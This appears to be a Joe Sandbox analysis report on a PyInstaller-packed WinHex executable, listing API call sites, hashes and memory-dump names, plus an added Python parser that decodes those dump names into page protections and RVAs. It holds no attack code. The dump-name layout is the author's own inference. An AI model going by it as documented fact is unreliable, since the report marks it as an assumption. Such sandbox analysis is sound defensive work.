                                                                                                                        • Instruction ID: 168030f2688e4f029ebd23d68c59afd8406f54ed8549f26a8f74ab4326adc91d
                                                                                                                        • Opcode Fuzzy Hash: ff2257711b1d275b862e663729d543ef4812b290fbf882e2e1232765a84f7875
                                                                                                                        • Instruction Fuzzy Hash: 7C118F62A18B8285DA10AF25F404169EB61FB85FF4F984331EABD077E9CFBDD0518740
                                                                                                                        APIs
                                                                                                                        • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7C5BE4891), ref: 00007FF7C5BE49AF
                                                                                                                        • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7C5BE4891), ref: 00007FF7C5BE49C5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Time$System$FileLocalSpecific
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1707611234-0
                                                                                                                        • Opcode ID: 42d85f7bbfb38a33647f37402af2049ec243a38652db21839daf1665d9964160
                                                                                                                        • Instruction ID: 4682bec1fc50fbb88b7472f5c1787bb8299ca6c61d80641a54a3b7f353c3f9df
                                                                                                                        • Opcode Fuzzy Hash: 42d85f7bbfb38a33647f37402af2049ec243a38652db21839daf1665d9964160
                                                                                                                        • Instruction Fuzzy Hash: 7611A37260C64282EB64AF15A41113EFB60FB85F71F901235F69E819D8EF6ED048DB20
                                                                                                                        APIs
                                                                                                                        • RtlFreeHeap.NTDLL(?,?,?,00007FF7C5BF1E42,?,?,?,00007FF7C5BF1E7F,?,?,00000000,00007FF7C5BF2345,?,?,?,00007FF7C5BF2277), ref: 00007FF7C5BE9E2E
                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF7C5BF1E42,?,?,?,00007FF7C5BF1E7F,?,?,00000000,00007FF7C5BF2345,?,?,?,00007FF7C5BF2277), ref: 00007FF7C5BE9E38
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorFreeHeapLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 485612231-0
                                                                                                                        • Opcode ID: 875bb2537aa3df01b4a1e34b7b101e94a2dc47b4cb64fa0c1180c15e07a79d81
                                                                                                                        • Instruction ID: 494b14187b0b1a6451765c43983435aa15d7d2587a37a94c2e0a42a33da3d120
                                                                                                                        • Opcode Fuzzy Hash: 875bb2537aa3df01b4a1e34b7b101e94a2dc47b4cb64fa0c1180c15e07a79d81
                                                                                                                        • Instruction Fuzzy Hash: 3DE08C54F0860382FF18BFB2A84903ADA619F84F60BC84034CA0D46252EE6EA8498330
                                                                                                                        APIs
                                                                                                                        • CloseHandle.KERNELBASE(?,?,?,00007FF7C5BE9EA5,?,?,00000000,00007FF7C5BE9F5A), ref: 00007FF7C5BEA096
                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF7C5BE9EA5,?,?,00000000,00007FF7C5BE9F5A), ref: 00007FF7C5BEA0A0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseErrorHandleLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 918212764-0
                                                                                                                        • Opcode ID: 649148bb364a2e2bb6c01b4b98e8ba63ccdb9764b03dbbc10b4a89a301f042aa
                                                                                                                        • Instruction ID: 7f84b207762393e0da70931c21209f796c4f0b4e6740b92b39732c4e705dcdc2
                                                                                                                        • Opcode Fuzzy Hash: 649148bb364a2e2bb6c01b4b98e8ba63ccdb9764b03dbbc10b4a89a301f042aa
                                                                                                                        • Instruction Fuzzy Hash: 6521D411B1864341FA55BF64A45827D9B95EF85FB0F8C4235DA2E477C2CEAEE8458320
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3215553584-0
                                                                                                                        • Opcode ID: ce9b52f680c1b5a7cbc95938458c13a1dbec8158119413affe32dcc0b3335035
                                                                                                                        • Instruction ID: 35dacee28abefbcd11c2bd441af806b340a66bea57243c50de132c44f9a3e408
                                                                                                                        • Opcode Fuzzy Hash: ce9b52f680c1b5a7cbc95938458c13a1dbec8158119413affe32dcc0b3335035
                                                                                                                        • Instruction Fuzzy Hash: 0B41B33291864287EA34EF15A541279FBA1FF95F60F980131D78E876D1CFAEE402C761
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _fread_nolock
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 840049012-0
                                                                                                                        • Opcode ID: b0a3f97d720b08f5889a39697c224726df5d2ea433a547051867bce8317cd2b0
                                                                                                                        • Instruction ID: f9029f1aedb994ba8513785c98b00821a53c21dc28c6a6041eafdea3ce852fae
                                                                                                                        • Opcode Fuzzy Hash: b0a3f97d720b08f5889a39697c224726df5d2ea433a547051867bce8317cd2b0
                                                                                                                        • Instruction Fuzzy Hash: CE218021B0969246EA25BF12A5047FAEA51BF46FF4FC84430EE0D0778ACE7EE1468710
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
• Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
• Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
APIs
Memory Dump Source
• Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
• Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
APIs
Memory Dump Source
• Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
• Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
APIs
Memory Dump Source
• Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
• Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
APIs
• HeapAlloc.KERNEL32(?,?,00000000,00007FF7C5BEA8B6,?,?,?,00007FF7C5BE9A73,?,?,00000000,00007FF7C5BE9D0E), ref: 00007FF7C5BEDD95
Memory Dump Source
• Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
• Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
Similarity
• API ID: AllocHeap
• String ID:
• API String ID: 4292702814-0
APIs
• HeapAlloc.KERNEL32(?,?,?,00007FF7C5BDFE44,?,?,?,00007FF7C5BE1356,?,?,?,?,?,00007FF7C5BE2949), ref: 00007FF7C5BECB0A
Memory Dump Source
• Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
• Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
Similarity
• API ID: AllocHeap
• String ID:
• API String ID: 4292702814-0
APIs
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
• Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
Similarity
• API ID: MessageSend$Window$Create$Move$ObjectSelect$#380BaseClientDialogDrawFontIndirectInfoParametersRectReleaseSystemTextUnits
• String ID: BUTTON$Close$EDIT$Failed to execute script '%ls' due to unhandled exception: %ls$STATIC
• API String ID: 2446303242-1601438679
APIs
Memory Dump Source
• Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
• Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
Similarity
• API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
• String ID:
• API String ID: 3140674995-0
APIs
Memory Dump Source
• Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
• Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
• String ID:
• API String ID: 1239891234-0
APIs
Memory Dump Source
• Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
• Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
Similarity
• API ID: FileFindFirst_invalid_parameter_noinfo
• String ID:
• API String ID: 2227656907-0
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc
                                                                                                                        • String ID: Failed to get address for PyDict_GetItemString$Failed to get address for PyErr_Clear$Failed to get address for PyErr_Fetch$Failed to get address for PyErr_NormalizeException$Failed to get address for PyErr_Occurred$Failed to get address for PyErr_Print$Failed to get address for PyErr_Restore$Failed to get address for PyEval_EvalCode$Failed to get address for PyImport_AddModule$Failed to get address for PyImport_ExecCodeModule$Failed to get address for PyImport_ImportModule$Failed to get address for PyList_Append$Failed to get address for PyList_New$Failed to get address for PyLong_AsLong$Failed to get address for PyMarshal_ReadObjectFromString$Failed to get address for PyMem_RawFree$Failed to get address for PyModule_GetDict$Failed to get address for PyObject_CallFunction$Failed to get address for PyObject_CallFunctionObjArgs$Failed to get address for PyObject_GetAttrString$Failed to get address for PyObject_SetAttrString$Failed to get address for PyObject_Str$Failed to get address for PyRun_SimpleStringFlags$Failed to get address for PySys_AddWarnOption$Failed to get address for PySys_GetObject$Failed to get address for PySys_SetArgvEx$Failed to get address for PySys_SetObject$Failed to get address for PySys_SetPath$Failed to get address for PyUnicode_AsUTF8$Failed to get address for PyUnicode_Decode$Failed to get address for PyUnicode_DecodeFSDefault$Failed to get address for PyUnicode_FromFormat$Failed to get address for PyUnicode_FromString$Failed to get address for PyUnicode_Join$Failed to get address for PyUnicode_Replace$Failed to get address for Py_BuildValue$Failed to get address for Py_DecRef$Failed to get address for Py_DecodeLocale$Failed to get address for Py_DontWriteBytecodeFlag$Failed to get address for Py_FileSystemDefaultEncoding$Failed to get address for Py_Finalize$Failed to get address for Py_FrozenFlag$Failed to get address for Py_GetPath$Failed to get address for Py_IgnoreEnvironmentFlag$Failed to get address for Py_IncRef$Failed to get address for Py_Initialize$Failed to get address for Py_NoSiteFlag$Failed to get address for Py_NoUserSiteDirectory$Failed to get address for Py_OptimizeFlag$Failed to get address for Py_SetPath$Failed to get address for Py_SetProgramName$Failed to get address for Py_SetPythonHome$Failed to get address for Py_UTF8Mode$Failed to get address for Py_UnbufferedStdioFlag$Failed to get address for Py_VerboseFlag$GetProcAddress$PyDict_GetItemString$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyList_New$PyLong_AsLong$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyRun_SimpleStringFlags$PySys_AddWarnOption$PySys_GetObject$PySys_SetArgvEx$PySys_SetObject$PySys_SetPath$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_BuildValue$Py_DecRef$Py_DecodeLocale$Py_DontWriteBytecodeFlag$Py_FileSystemDefaultEncoding$Py_Finalize$Py_FrozenFlag$Py_GetPath$Py_IgnoreEnvironmentFlag$Py_IncRef$Py_Initialize$Py_NoSiteFlag$Py_NoUserSiteDirectory$Py_OptimizeFlag$Py_SetPath$Py_SetProgramName$Py_SetPythonHome$Py_UTF8Mode$Py_UnbufferedStdioFlag$Py_VerboseFlag
                                                                                                                        • API String ID: 190572456-3109299426
                                                                                                                        • Opcode ID: 67747be8a076f706c1c9372e7d2496993eaa02b7082083ef588a9e8b618be952
                                                                                                                        • Instruction ID: bd422602f46fafa73c35be0ef28e080ed92d7510197824d4d6252bdd787b257f
                                                                                                                        • Opcode Fuzzy Hash: 67747be8a076f706c1c9372e7d2496993eaa02b7082083ef588a9e8b618be952
                                                                                                                        • Instruction Fuzzy Hash: C142BA69A0DB0791EA59EF18B850174EBA1BF44FB4BC45235C90E062A8FF7EF5598330
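The "Memory Dump Source" lists repeat the same six .sdmp names for every function of process 12, and the only thing that tells the code region apart from the data regions is the dotted field string in the name. The following parser is an added example, not code from Joe Sandbox or from this report, and its reading of the fields is an assumption: the first field (0x0C = 12) and the base address agree with the IDA snapshot name hcaresult_12_2_7ff7c5bd0000, and the fifth and seventh fields take exactly the winnt.h Protect and Type values (0x20 PAGE_EXECUTE_READ, 0x02 PAGE_READONLY, 0x04 PAGE_READWRITE, 0x01000000 MEM_IMAGE), which is why they are decoded that way. The sixth field (always 00000001 here) is left undecoded. REPORT_LINES is constructed from the block above; the regexes also tolerate the "Download File" link text that extraction glues onto the names.

```python
"""Decode Joe Sandbox memory-dump (.sdmp) names from a "Memory Dump Source" list.

Added example; not code from Joe Sandbox or from this report.  Field layout
is an assumption inferred from the names in this section (see lead-in).
"""
import re
from dataclasses import dataclass

# winnt.h memory protection and region type constants
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# <proc>.<phase>.<dump>.<base>.<protect>.<flag>.<type>.<module>.sdmp  (assumed layout)
SDMP_RE = re.compile(
    r"^(?P<proc>[0-9A-F]{8})\.(?P<phase>[0-9A-F]{8})\.(?P<dump>\d+)\."
    r"(?P<base>[0-9A-F]{16})\.(?P<protect>[0-9A-F]{8})\.(?P<flag>[0-9A-F]{8})\."
    r"(?P<type>[0-9A-F]{8})\.(?P<module>[0-9A-F]{8})\.sdmp$"
)
# Non-greedy so that a glued "…sdmpDownload File" suffix is ignored.
SOURCE_RE = re.compile(r"Source File: (\S+?\.sdmp), Offset: ([0-9A-F]{16}), based on PE: (true|false)")
ASSOC_RE = re.compile(r"Associated: (\S+?\.sdmp)")


@dataclass(frozen=True)
class SdmpRegion:
    process: int    # analysis process number (12 for this image)
    phase: int      # 2 in every name here; assumed to be the end-of-analysis snapshot
    dump_id: int    # increasing counter; meaning not established by the report
    base: int       # region base address
    protect: str    # decoded Protect value (PAGE_GUARD/NOCACHE modifiers dropped)
    mem_type: str   # decoded Type value
    module: int     # assumed module index inside the process


def parse_sdmp(name: str) -> SdmpRegion:
    m = SDMP_RE.match(name)
    if not m:
        raise ValueError(f"not a Joe Sandbox dump name: {name}")
    protect = int(m["protect"], 16)
    mem_type = int(m["type"], 16)
    return SdmpRegion(
        process=int(m["proc"], 16), phase=int(m["phase"], 16),
        dump_id=int(m["dump"]), base=int(m["base"], 16),
        protect=PAGE_PROTECT.get(protect & 0xFF, f"0x{protect:x}"),
        mem_type=MEM_TYPE.get(mem_type, f"0x{mem_type:x}"),
        module=int(m["module"], 16),
    )


def image_map(report_lines):
    """Return (image_base, rows) with rows = (rva, protect, type, is_source) sorted by RVA."""
    image_base, regions = None, []
    for line in report_lines:
        m = SOURCE_RE.search(line)
        if m:
            image_base = int(m[2], 16)
            regions.append((parse_sdmp(m[1]), True))
            continue
        m = ASSOC_RE.search(line)
        if m:
            regions.append((parse_sdmp(m[1]), False))
    if image_base is None:
        raise ValueError("no 'Source File' line with an Offset")
    rows = sorted((r.base - image_base, r.protect, r.mem_type, src) for r, src in regions)
    return image_base, rows


def executable_rvas(report_lines):
    """RVAs of the regions worth disassembling (PAGE_EXECUTE_*)."""
    return [rva for rva, prot, _, _ in image_map(report_lines)[1] if prot.startswith("PAGE_EXECUTE")]


# Constructed input: the "Memory Dump Source" block of this report, copied verbatim.
REPORT_LINES = [
    "• Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true",
    "• Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmpDownload File",
    "• Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmp",
    "• Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmp",
    "• Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmp",
    "• Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmp",
]

if __name__ == "__main__":
    base, rows = image_map(REPORT_LINES)
    print(f"image base 0x{base:X}")
    for rva, prot, typ, src in rows:
        print(f"  RVA 0x{rva:06X}  {prot:<22} {typ:<10} {'<- disassembled' if src else ''}")
```

Run on the block above this gives one PAGE_EXECUTE_READ region at RVA 0x1000 (the one IDA was pointed at) with read-only regions at 0x0, 0x2A000 and 0x4E000 and writable ones at 0x3D000 and 0x4C000, the usual header/.text/.rdata/.data/.pdata shape of a 64-bit PE; that is the cross-check that justifies the decoding, and it is the same selection you would make by hand before feeding a dump to a disassembler.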
                                                                                                                        APIs
                                                                                                                        Strings
